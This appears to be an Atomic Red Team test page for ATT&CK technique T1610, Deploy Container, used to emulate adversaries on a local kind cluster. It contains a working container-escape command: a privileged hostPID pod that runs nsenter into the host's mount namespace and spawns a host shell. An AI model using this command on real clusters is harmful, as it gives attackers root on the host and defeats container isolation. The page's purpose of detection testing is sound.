T1610.md

T1610 - Deploy Container

Description from ATT&CK

Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.

Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)

Atomic Tests

• Atomic Test #1 - Deploy container using nsenter container escape

Atomic Test #1 - Deploy container using nsenter container escape

In this escape kubectl is used to launch a new pod, with a container that has the host pids mapped into the container (hostPID:true). It uses the alpine linux container image. It runs with privilege on the host (privileged:true). When the container is launched the command nsenter --mount=/proc/1/ns/mnt -- /bin/bash is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container.

Additional Details:

• https://twitter.com/mauilion/status/1129468485480751104
• https://securekubernetes.com/scenario_2_attack/

Supported Platforms: Linux

Attack Commands: Run with sh!

kubectl --context kind-atomic-cluster run atomic-escape-pod --restart=Never -ti --rm --image alpine --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'

Cleanup Commands:

kubectl --context kind-atomic-cluster delete pod atomic-escape-pod

Dependencies: Run with sh!

Description: Verify docker is installed.

Check Prereq Commands:

which docker 

Get Prereq Commands:

if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi

Description: Verify docker service is running.

Check Prereq Commands:

sudo systemctl status docker 

Get Prereq Commands:

sudo systemctl start docker

Description: Verify kind is in the path.

Check Prereq Commands:

which kind 

Get Prereq Commands:

curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64
chmod +x ./kind
mv kind /usr/bin/kind

Description: Verify kind-atomic-cluster is created

Check Prereq Commands:

sudo kind get clusters 

Get Prereq Commands:

sudo kind create cluster --name atomic-cluster

Description: Verify kubectl is in path

Check Prereq Commands:

which kubectl 

Get Prereq Commands:

curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x ./kubectl
mv kubectl /usr/bin/kubectl